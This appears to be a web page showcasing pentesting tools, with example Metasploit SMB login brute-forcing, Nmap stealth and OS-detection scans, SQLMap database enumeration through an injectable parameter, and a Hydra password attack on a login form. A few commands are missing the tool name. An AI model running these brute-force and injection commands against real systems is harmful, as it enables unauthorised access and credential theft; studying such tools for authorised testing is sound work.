Pentesting components, tools and application

Metasploit Tool

By rapid7

Enable on Linux and Windows x86/x64


OWASP TOP 10
    root#~ msf > use auxiliary/scanner/smb/smb_login
    root#~ msf auxiliary(smb_login) > show options

    Module options (auxiliary/scanner/smb/smb_login):

    Name              Current Setting  Required  Description
    ----              ---------------  --------  -----------
    BLANK_PASSWORDS   false            no        Try
    BRUTEFORCE_SPEED  5                yes       How

    msf auxiliary(smb_login) > set RHOSTS 192.168.1.0/24
    RHOSTS => 192.168.1.0/24
                     

NMAP

Enable on Linux


Fyodor
    root#~ nmap -sS -sU -O scanme.nmap.org/24
          // Lance un scan furtif (stealth SYN scan + Scan UDP) contre chaque machine active parmi les 255 machines du réseau  de « classe C » sur lequel Scanme réside.  Il essaie aussi de déterminer le système d'exploitation sur chaque hôte actif.
          Cette démarche nécessite les privilèges de root puisqu'on utilise unSYN scan et une détection d'OS.

                    PORT      STATE SERVICE       VERSION
          21/tcp    open  ftp           FileZilla ftpd 0.9.37 beta
          25/tcp    open  smtp
          53/tcp    open  domain?
          80/tcp    open  http          Microsoft IIS webserver 7.0
          88/tcp    open  kerberos-sec  Microsoft Windows kerberos-sec
          110/tcp   open  pop3
          135/tcp   open  msrpc         Microsoft Windows RPC

    root#~ -v -p- scanme.nmap.org

            //Cette option scanne tous les ports réservés TCP sur la machine scanme.nmap.org . L'option -v active le mode verbeux et -p- scan l'ensemble des ports.

                         

SQLMap

Enable on Linux


Damele / Stampar
    root#~ sqlmap -u "http://192.168.136.131/try.php?id=1" --dbs

            Dbs
            +----------------+---------+
            | Database       | Entries |
            +----------------+---------+
            | testdb         | 1       |
            +----------------+---------+

    root#~ -u "http://192.168.136.131/try.php?id=1" -D testdb --tables

            Database: testdb
            +----------------+---------+
            | Table          | Entries |
            +----------------+---------+
            | dbo.users      | 4       |
            | dbo.users_blob | 2       |
            +----------------+---------+
                         

HYDRA

Enable on Linux


Hauser / Kessler
    root#~ hydra -l adminadmin1 -P password.txt fruitinjail.com http-form-post "/chall/ch011/login.php:user=^USER^&password=^PASS^&submit=Login:Failed" -o hydra.txt

    root#~ hydra --help

          [-l LOGIN|-L FILE] = adminadmin1
          [-p PASS|-P FILE]  = password.txt
          [Target URL]       = fruitinjail.com
          [Method]           = http-form-post
          ["Target Page:]    = "/chall/ch011/login.php:
          [User > ^USER^]    = user=^USER^
          [pass > ^PASS^]    = &password=^PASS^
          ['submit' > Login] = &submit=Login
          [:'Failed'"]       = :Failed"
          [-o OUTPUT FILE]   = hydra.txt